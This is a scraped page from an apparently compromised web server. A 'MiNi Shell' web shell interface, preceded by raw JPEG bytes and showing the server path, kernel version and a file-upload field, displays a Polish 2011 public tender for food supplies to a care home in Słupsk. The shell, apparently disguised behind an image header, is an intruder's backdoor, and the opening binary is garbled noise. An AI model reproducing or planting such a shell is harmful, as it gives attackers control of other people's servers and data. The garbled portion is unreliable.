JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111206/318877-N-2011.html

<p class="kh_header"><b>Słupsk: Dostawy artykułów spożywczych do Domu Pomocy Społecznej w Lubuczewie na rok 2012 w podzile na 3 części</b><br>
<b>Numer ogłoszenia: 318877 - 2011; data zamieszczenia: 06.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Lubuczewo 29A, 76-200 Słupsk, woj. pomorskie, tel. 0-59 846 26 30, faks 0-59 849 19 68.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy artykułów spożywczych do Domu Pomocy Społecznej w Lubuczewie na rok 2012 w podzile na 3 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawy artykułów spożywczych do Domu Pomocy Społecznej w Lubuczewie na rok 2012.
w podziale na 3 części: 
część 1 -  dostawy artykułów  mrożonych 15331100-8,

1.	MIESZANKA WARZYWNA 7-SKŁ. MROŻONA   kg    150,00

2.	PIEROGI Z TRUSKAWKAMI MROŻONE	kg            150,00

3.	PYZY ZIEMNIACZANE MROŻONE         kg 100,00
4.	PYZY Z MIĘSEM MROŻONE	kg      100,00

5.	WŁOSZCZYZNA MROŻONA	kg      100,00

6.	FASOLKA SZPARAGOWA MROŻONA  kg 250,00

7.	BROKUŁY MROŻONE	kg         30,00

8.	PIEROGI ZE ŚLIWKAMI MROŻONE kg  70,00

9.	KALAFIOR MROŻONY    kg                 220,00

10.	MIESZANKA CHIŃSKA MROŻONA  kg	40,00

11.	PIEROGI Z KAPUSTĄ MROŻONE   kg    70,00

12.	PIEROGI Z MIĘSEM MROŻONE      kg   100,00
13.	PIEROGI RUSKIE MROŻONE	kg	100,00
14.	SZPINAK MROŻONY	kg	40,00

część 2 -  dostawy artykułów mleczarskich 15500000-3, 

1.	MASŁO ROŚLINNE 250 g 	szt.	7 000,00

2.	MASŁO 250 g	             szt.	520,00

3.	JOGURT SMAKOWY 150 g	szt.	5 000,00

4.	SER FROMAGE 80g	              szt.	800,00

5.	SER TOPIONY 100 g	szt.	7 000,00

6.	SER ŻÓŁTY	              kg	750,00

7.	TWARÓG PÓŁTUSTY	kg	800,00

9.	MLEKO 2% UHT 1l           	szt.	6 700,00
                                             
10.	ŚMIETANA 12% 400 g	szt.	2 500,00

11.	ŚMIETANA 18% 400 g	szt.	160,00
			

część 3 -  dostawy różnych produktów spożywczych 15800000-6

1.	KETCHUP 480g	           szt,	90,00
2.	MUSZTARDA 1kg	           szt,	85,00
3.	MAJONEZ 700ml	           szt,	360,00
4.	ŻUR BIAŁY 500ml	           szt,	90,00
5.	SYROP OWOCOWY 5l	szt,	110,00
6.	WODA MINERALNA 1,5l	szt,	1 000,00
7.	SOK 1l	                           szt,	50,00
8.	SOS SŁODKO-KWAŚNY 300g	    szt,	15,00
9.	ANANASY KONSERWOWE 565g	szt,	25,00
10.	SZCZAW KONSERWOWY 900g	szt,	80,00
11.	PIECZARKI MARYNOWANE 300g	szt,	35,00
12.	GROSZEK KONSERWOWY 400g	szt,	70,00
13.	FASOLA CZERW.KONSERW.400 g	szt,	30,00
14.	KUKURYDZA KONSERWOWA 400g	szt,	40,00
15.	OGÓRKI KONSERWOWE 870g	              szt,	160,00
16.	PAPRYKA KONSERWOWA 900g	szt,	190,00
17.	KONCENTRAT POMIDOROWY 1kg	szt,	210,00
18.	KOPER SUSZONY 10g	              szt,	200,00
19.	NATKA PIETRUSZKI SUSZONA 10g	szt,	350,00
20.	MAKARON ŚWIDEREK 500g	             szt,	1 000,00
21.	MAKARON NITKI 400g	               szt,	300,00
22.	MĄKA PSZENNA	                            kg	700,00
23.	MĄKA ZIEMNIACZANA	               kg	80,00
24.	RYŻ	                                      kg	300,00
25.	SÓL	                                        kg	500,00
26.	CUKIER	                                      kg	1 800,00
27.	ŚLIWKI SUSZONE 100g	              szt,	35,00
28.	HERBATA MIĘTOWA 20 SASZ,	szt,	460,00
29.	HERBATA OWOCOWA GRANULOWANA 300g	szt,	50,00
30.	HERBATA OWOCOWA 20 SASZ,	               szt,	500,00
31.	HERBATA GRANULOWANA CZARNA 100g	szt,	600,00
32.	KAWA zbożowa rozp. 150g	                          szt,	350,00
33.	DŻEM 280g	                                     szt,	3 300,00
34.	KWASEK CYTRYNOWY 20g	                            szt,	90,00
35.	CHRZAN 190g	                                         szt,	35,00
36.	OCET 500 ml	                                         szt,	110,00
37.	OLEJ ROŚLINNY 1l	                                        szt,	520,00
38.	PRZYPRAWA W PŁYNIE DO ZUP 1l	szt,	100,00
39.	MIESZANKA WARZYWNA 3-SKŁ. 460g	szt,	210,00
40.	ROSOŁKI DROBIOWE KOSTKA 60g	szt,	350,00
41.	MAJERANEK 20g	                           szt,	200,00
42.	TYMIANEK 20 g	                           szt	100,00
43.	BAZYLIA 20g	                             szt	100,00
44.	PRZYPRAWA UNIWERSALNA 200g	szt,	600,00
45.	PAPRYKA MIELONA 20g	                 szt,	200,00
46.	PIEPRZ CZARNY 20g	                  szt,	650,00
47.	KMINEK 20g	                            szt	100,00
48.	ZIOŁA PROWANSALSKIE 10g	szt	30,00
49.	ZIELE ANGIELSKIE 20g	szt	130,00
50.	LIŚĆ LAUROWY 12g	szt,	120,00
51.	OREGANO 10g	               szt	30,00
52.	FASOLA BIAŁA	             kg	90,00
53.	GROCH ŁUSKANY	            kg	110,00
54.	CYNAMON 20g	szt,	80,00
55.	RODZYNKI 100g	szt,	100,00
56.	ŻELATYNA 50g	szt,	50,00
57.	PŁATKI OWSIANE	kg	55,00
58.	KASZA MANNA	kg	130,00
59.	KASZA JĘCZMIENNA	kg	100,00
60.	KASZA GRYCZANA 	            kg	100,00
61.	MUSLI	                         kg	120,00
62.	PŁATKI KUKURYDZIANE	kg	140,00.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8, 15.50.00.00-3, 15.80.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Potwierdzenie posiadania przez Wykonawcę dokumentu HDI na dostawy produktów w części 2 i 3</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://dpslubuczewo.mojbip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Lubuczewie
Lubuczewo 29A 
76-200 Słupsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.12.2011 godzina 10:00, miejsce: Dom Pomocy Społecznej w Lubuczewie
Lubuczewo 29A 
76-200 Słupsk.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawy artykułów  mrożonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.MIESZANKA WARZYWNA 7-SKŁ. MROŻONA     kg	  150,00

2.PIEROGI Z TRUSKAWKAMI MROŻONE          kg	      150,00

3.PYZY ZIEMNIACZANE MROŻONE             kg       100,00	  
4.PYZY Z MIĘSEM MROŻONE	kg	100,00

5.WŁOSZCZYZNA MROŻONA kg 1000,00

6.FASOLKA SZPARAGOWA MROŻONA  kg  250,00

7.BROKUŁY MROŻONE  kg  30,00

8.PIEROGI ZE ŚLIWKAMI MROŻONE  kg  70,00

9.KALAFIOR MROŻONY kg	220,00

10.MIESZANKA CHIŃSKA MROŻONA	kg	40,00

11.PIEROGI Z KAPUSTĄ MROŻONE	kg	70,00

12.PIEROGI Z MIĘSEM MROŻONE	kg 	100,00
13.	PIEROGI RUSKIE MROŻONE	kg	100,00
14.	SZPINAK MROŻONY	kg	40,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawy artykułów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	MASŁO ROŚLINNE 250 g 	szt.	7 000,00

2.	MASŁO 250 g	szt.	520,00

3.	JOGURT SMAKOWY 150 g	szt.	5 000,00

4.	SER FROMAGE 80g	szt.	800,00

5.	SER TOPIONY 100 g	szt.	7 000,00

6.	SER ŻÓŁTY	kg	750,00

7.	TWARÓG PÓŁTLUSTY	kg	800,00

9.	MLEKO 2% UHT 1l	szt.	6 700,00
                                             
10.	ŚMIETANA 12% 400 g	szt.	2 500,00

11.	ŚMIETANA 18% 400 g	szt.	160,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawy różnych produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	KETCHUP 480g	szt,	90,00
2.	MUSZTARDA 1kg	szt,	85,00
3.	MAJONEZ 700ml	szt,	360,00
4.	ŻUR BIAŁY 500ml	szt,	90,00
5.	SYROP OWOCOWY 5l	szt,	110,00
6.	WODA MINERALNA 1,5l	szt,	1 000,00
7.	SOK 1l	szt,	50,00
8.	SOS SŁODKO-KWAŚNY 300g	szt,	15,00
9.	ANANASY KONSERWOWE 565g	szt,	25,00
10.	SZCZAW KONSERWOWY 900g	szt,	80,00
11.	PIECZARKI MARYNOWANE 300g	szt,	35,00
12.	GROSZEK KONSERWOWY 400g	szt,	70,00
13.	FASOLA CZERW.KONSERW.400 g	szt,	30,00
14.	KUKURYDZA KONSERWOWA 400g	szt,	40,00
15.	OGÓRKI KONSERWOWE 870g	szt,	160,00
16.	PAPRYKA KONSERWOWA 900g	szt,	190,00
17.	KONCENTRAT POMIDOROWY 1kg	szt,	210,00
18.	KOPER SUSZONY 10g	szt,	200,00
19.	NATKA PIETRUSZKI SUSZONA 10g	szt,	350,00
20.	MAKARON ŚWIDEREK 500g	szt,	1 000,00
21.	MAKARON NITKI 400g	szt,	300,00
22.	MĄKA PSZENNA	kg	700,00
23.	MĄKA ZIEMNIACZANA	kg	80,00
24.	RYŻ	kg	300,00
25.	SÓL	kg	500,00
26.	CUKIER	kg	1 800,00
27.	ŚLIWKI SUSZONE 100g	szt,	35,00
28.	HERBATA MIĘTOWA 20 SASZ,	szt,	460,00
29.	HERBATA OWOCOWA GRANULOWANA 300g	szt,	50,00
30.	HERBATA OWOCOWA 20 SASZ,	szt,	500,00
31.	HERBATA GRANULOWANA CZARNA 100g	szt,	600,00
32.	KAWA zbożowa rozp. 150g	szt,	350,00
33.	DŻEM 280g	szt,	3 300,00
34.	KWASEK CYTRYNOWY 20g	szt,	90,00
35.	CHRZAN 190g	szt,	35,00
36.	OCET 500 ml	szt,	110,00
37.	OLEJ ROŚLINNY 1l	szt,	520,00
38.	PRZYPRAWA W PŁYNIE DO ZUP 1l	szt,	100,00
39.	MIESZANKA WARZYWNA 3-SKŁ. 460g	szt,	210,00
40.	ROSOŁKI DROBIOWE KOSTKA 60g	szt,	350,00
41.	MAJERANEK 20g	szt,	200,00
42.	TYMIANEK 20 g	szt	100,00
43.	BAZYLIA 20g	szt	100,00
44.	PRZYPRAWA UNIWERSALNA 200g	szt,	600,00
45.	PAPRYKA MIELONA 20g	szt,	200,00
46.	PIEPRZ CZARNY 20g	szt,	650,00
47.	KMINEK 20g	szt	100,00
48.	ZIOŁA PROWANSALSKIE 10g	szt	30,00
49.	ZIELE ANGIELSKIE 20g	szt	130,00
50.	LIŚĆ LAUROWY 12g	szt,	120,00
51.	OREGANO 10g	szt	30,00
52.	FASOLA BIAŁA	kg	90,00
53.	GROCH ŁUSKANY	kg	110,00
54.	CYNAMON 20g	szt,	80,00
55.	RODZYNKI 100g	szt,	100,00
56.	ŻELATYNA 50g	szt,	50,00
57.	PŁATKI OWSIANE	kg	55,00
58.	KASZA MANNA	kg	130,00
59.	KASZA JĘCZMIENNA	kg	100,00
60.	KASZA GRYCZANA 	kg	100,00
61.	MUSLI	kg	120,00
62.	PŁATKI KUKURYDZIANE	kg	140,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.01.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com